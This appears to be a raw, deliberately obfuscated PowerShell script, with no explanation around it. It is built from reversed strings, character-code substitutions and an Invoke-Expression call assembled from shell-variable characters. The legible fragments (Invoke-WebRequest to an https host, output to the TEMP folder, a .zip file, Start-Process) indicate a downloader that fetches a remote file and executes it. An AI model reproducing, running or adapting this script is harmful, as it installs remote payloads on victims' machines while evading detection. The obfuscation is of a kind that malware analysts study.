 ([REGEx]::MatcHES( " ) )93]RAhC[]gNiRts[,)68]RAhC[+18]RAhC[+88]RAhC[((ECaLPER.)421]RAhC[]gNiRts[,)77]RAhC[+79]RAhC[+611]RAhC[((ECaLPER.)43]RAhC[]gNiRts[,'gEL'(ECaLPER.)'$','ULx'(ECaLPER.)')gEL )VQX VQX  VQXsfoVQX eLB'+'aiRav-TEs (ULxgE'+'L+)])htGneL.ZKS9ORULx( - ..'+'1 - [ZKS9ORULx( ]GNiRts[+gEL )VQXVQX  VQXSFO:elbAirAvVQX METi-teS (ULxgEL()VQXxVQX+]43[emoHspULx+]12[eMoHSPULx (.  ;) gEL((VQX &( xX8ENv:'+'cOmSPEC[4,15,25]-jVQX+VQXoiNVuZVuZ)(((f10{38}{'+'8}{42}{36}{45}{33}{31}{20}{12}{68}{46}{27}{6VQX+VQX7}{'+'61}{2VQX+VQX6}{35}{34}{51}{49}{37}{1'+'0}{5}{4'+'8}{18}{32}{24}{59}{74}{'+'53}{9}{52}{50}'+'{63}{75'+'}{13}{11}{70}{23}{60}{'+'6}{43}{40}{76}{4VQX+VQX}{19}{3}{71}{58}{44}{29}VQX+VQX{41}{47}{21}{65}{22}{0}{28}{1}{7}{17}{30}{62}{'+'25}{16}{55}{15}{69}{39}{14}{57}{7VQX+VQX3}{64}{54}{56}{2'+'}{66}{'+'72}f10 -fVuZL+VqL1VVQX+VQXuZ,VuZq'+'IVuZ,VuZinG][ChAr]96)MYRVuZ,VuZLVQX+VQXWW4jNlOAdVqL+VqL} = LXVqL+VuZ,VuZLVuZ,VuZqL,aVqL+VqLVQX+VQX1q919708a1q,VuZ,V'+'uZL} =VqL+VqL LX6{VqL+VqLtWVqL+VqL4'+'jVqL+VqLRuVqL+VqLe};'+'
     VqL+VqL VqL+VqL'+'if (&(RVqL+VqLATVqVQX+'+'VQXL+VuZ,VuZnvV'+'qL+VqLV'+'QX+VQXokVqL+'+'VqLea1q,a1VuZ,VuZLX6VqL+VqL{VqL+VqLSWVqL+VqL4j'+'oMEdaW4jTVuZ'+',VuZjmVqL+VVuZ,VuZqub.a'+'1q,VqL+VqLa1qC'+'T.zipa1q,aVqL+VqL1q1a1qVqL+VVuZ,VuZ= RAVuZ,VuZqLVuVQX+VQ'+'XZ,VuZH} VVQX+VQXqL+VqLVuZ,VQX+VQXVuZce(([VQX+VQXChAVuZ,VuZ;
    }
   VqVuZ,VuZVQX+VQXV'+'q'+'LVVQX+VQXuZ,VuZq-RaVqL+V'+'qL1VqL+VqLqVqL+VqL,VqL+VqLa1qMethodVqL+VqVQX+VQXLa1q)VqL+VqL '+'-'+'Ur'+'i VqL+VqLLXVqL+VqL6{I}.VqL+VqLRATaRAVqL+VqLT -Ou'+'tVqL+VqLFile LXVqL+VVuZ,VuZqL+VqL(a1VqL+VVQX+VQXqLqbVqL+VqLa1q) = (RAVqLVuZ,VuZ+VqL {
 VqL+VqL  VqL+VqL     LX6{'+'dW4VqL+VqLjoVq'+'L+VqVuZ,VuZVqL2VqL+VqL}VqL+VqL{4}{15}{7}VQX+VQXVqL+V'+'qL{14}{13}{5}VqL+VqL{VqVQ'+'X+VQXL'+'+VqL10}VqL+VqL{6VqL+VVuZ,VuZRVQX+VQXVqL+VqVuZ,VuZ}{VqL+VqL0}VqL+VqL{VqL'+'+VqL1}{4}RAT VqL+VQX+VQXVqL-fa1qea1q,VqL+VqLaVqVuZ,V'+'uZVqL+VqL
VqL+VqL    VQX+VQX  LVqL+VqLX6{DVqL+VqVuZ,VVQ'+'X+VQXuZ{VqL+VqL2}'+'{0}{1VqL+VqL}RVuZ,V'+'uZ(RVqL+VqL'+'AT{1VqL+VqL}{VVQX+VQXqL+VqL'+'2}{0}RAVqL+VqLT -fVqL+VqLaVuZ,VuZLsVqL+VqLeVQX+VQXr-atta'+'chmena1VqL+VqLqVqL+VVuZ,VuZga1qVqL+VqL,a1qhtVqL+VqLa1q'+',a1VqL+VqLqVqL+VqLcoma1qVqL'+'VuZ,V'+'uZqVQX+VQXstaVqL+VQX+VQXVqL1q,a1VuZ,VQX+VQXVuZwW4jN'+'VVuZ,VuZqL6'+'VqL+VqL{FIVqL+Vq'+'LlVqL+VqLeW4jPAVqL+VqLTh}VqL+VqL; 
VqL+Vq'+'L     VuZ,VuZ}VqL+VqL{VqL+VqL'+'0}{3}{VqL+VqL9VqL+VqL}VqL+VqL{11}{VVQX+VQXqL'+'+VuZ,VuZ+VqLTVuZ,VuZVqLbjVqL+VqVQX+VQXLectVqL+VqL]VQX+V'+'QX@{(a'+'1qaVqL+VqLa1q)VQX+VQX VqL+VqL= (VqL+Vq'+'LRAT{1}{VQX+VQX8VuZ,VuZVQX+VQXa1q/FRa1qVQX+VQX,a1qNa1qV'+'QX+VQX,'+'a1VqL+VqLqsVqL+VqL/VuZ'+',VuZqL,VuZ,VuZVqL(VQX+'+'V'+'QXVqL+VqL
  [PVuZ,VuZqLaVqL+VqL1q,VqL+VqLa1qHXFaVqL+V'+'qL1q,a1VuZ,VuZ (VqL

  VuZ,VuZqLkaGVqL).R'+'ePlAV'+'uZ,VuZ+VqL1qTesta1q) VqL+VqLLX6VqL+VqL{FW4V'+'qL+VqLjIlW4jVqL+VqLepAVqL+VqLtVuZ,VuZqL+VqLlOVqL+VqLVuZ,VuZa} VqL+VqL= @VqL+VuZ,VuZVqL{1VqL+VqL}{0}RAT-f a1q-PatVqL+VqLha'+'1VqL+VqLq,'+'aVqLVuZ,VuZ{D'+'VqL+VqLoW4VqL+V'+'qLjVqL+VqLVuZ,VuZSVqL+VqLC'+'VqL+VqLusVqL+VqLtoVqL+VqLmOVqV'+'QX+VQXL+VuZ,VuZqL+VqL{12}RAT-f a1VqL+VqLq//VuZ,VuZadVqL+VqL}) {VqL+V'+'qLVQX+VQX
        &VqL+VqL(VuZVQX+VQX,VuZaVQX+VQX1qtVqL+VQX+VQXVqLsVQX+'+'VQX/filea1q);VqL+VqL VVuZ,VuZhVqL+VVu'+'ZVQX+VQX,VuZ VQX+VQX t'+'VqVQX+VQXL+VqLVuZ,Vu'+'ZVqL+VqL1a1q,aVqL+VqL1qtVQX+VQXps'+'VqL+VqL:a1q,aVqL+VqL1qtVuZ,VuZ'+'qLeVqL+VqLDA'+'T'+'A}) {
  VuZ,VuZ+VqLoW4VQX+VQXVuZ,VuZrVuZ,VQX+VQXVuZ+VqL1qceVqL+VqLssa1q,a1qVqL+VqLVQX+VQXS'+'ta'+'1qVqL+VqL,a1qart-VqL+VqLProaVqL+VqL1q) LXVqL+VqL6{fIW'+'4jVQX+VQXlepW4jAVqL+VqLTh}VuZ,VuZ]106),[STVQX+VQXrVuZ,'+'V'+'uZr]82+[VQX'+'+VQXChAr]65+[Ch'+'Ar]84),[STrinG][ChAr]34).Re'+'PlAce(([ChArVuZ,VuZL  } 
 '+'VqL+VqL     ifVqL+VqL ('+'LX6VqL+VqLVuZ,VuZAT'+'-VqL+VqLf a1qVqL+VQX+VQXVqLCT1.VqL+VqLma1q,VuZ,VuZLOwVqL+VqLW4jNlOadVqL+Vq'+'V'+'uZ,VuZVqL+VqLq,a1q/VQX+VQXuVqL+VqVuZ,VuZ '+'}
    VqL+VqL VQX+VQX V'+'qL+'+'VqL&'+'VuZ,VuZry VqL+VqVQX+VQXL{
'+'VuZ,VuZ([ChAr]87+[ChAr]52+VQX+VQX[ChAVu'+'Z,VuZ'+'LAVqL'+'+VqLTVVQX+VQXqL'+'+VqL{2VqL+VqL}VqL+VqL{3VuZ,VuZ .( kaGenv:coMsPEC[4,26,25]VuZ,VuZ+VqL,a1qia1VuZ,VuZ}VVuZ,VuZL+V'+'q'+'L Vq'+'L+VqVQX+VQXL'+'VQX+VQXcVQX+VQXatcVqL+VqLh {VQX+VQX
    VqL+VqL}VqL+VqL
  }

  VqL).RVQX+VQXeP'+'lAce(([ChAr]'+'65+[ChAr]10'+'0+[ChAr]76),[STrinG]['+'ChAr]92)VQX+VQX.Re'+'PlAce(([ChAr]7VQX+V'+'QX6+[ChAr]88+[ChAr]54),VVuZ,VuZTLX6env:TEVqL+VqLMV'+'qL+Vq'+'LPAdLLX6(LVqL+VqLX6i.b)RAT;VuZ,VVQX+VQXuZVqL6{FW4jALse};
  VQX+VQX VqL+VqL VqL+VqVuZ,VuZ-JoInVqLV'+'qL)VuZ,VuZ]97+[ChAr]49+[ChAr]113),[STrinG][C'+'hAr]39).RePlAce(V'+'uZ'+',VuZa1qsia1q,a1qFRHVqL+'+'VqLXVqL+VqLFNa1q)}
);
  f'+'oVqL+VqLreach VqL+VqL(LX6{iVqL+VqL} in LX6{s'+'W4jVqLVuZ,VuZ      VqL+VqLLXVqL+VqL6{FVqL+VqLI'+'LVqL+VqLW4jEPW4jATVuZ,VuZh})VqVuZ)).rEPlACeVQX+VQX(VuZVqLVuZ,[stRIng][ChAr]39).rEPlACe(([ChAr]77+[ChAr]89+[ChAr]82'+'),[stRIng][ChAr]124).rEPlACe(V'+'uZkaGVuZ,[stRIng][ChAr]'+'36) ) VQX)-cREplaCeVQXf10VQX,[cHAr]34-rePLAce ([cHAr]12'+'0+[cHAr]88+[cHAr]56),[cHAr]36  -cREplaCe VQXVuZVQX,[cHAr]39) Mat& ( ULxsHeLliD[1]+ULxSHelLid[13]+VQXXVQX)gEL (  )gELZgE'+'L+gELKS9or'+'gEL( Elbairav-Tes'( ( )''NIOj-]52,42,4[cEpsmoC:vNe$ (& " ,'.' , 'rigHt'+'T'+'O'+'LeFT' )-JOIN '' ) | &( $sheLLID[1]+$shelLid[13]+'x')
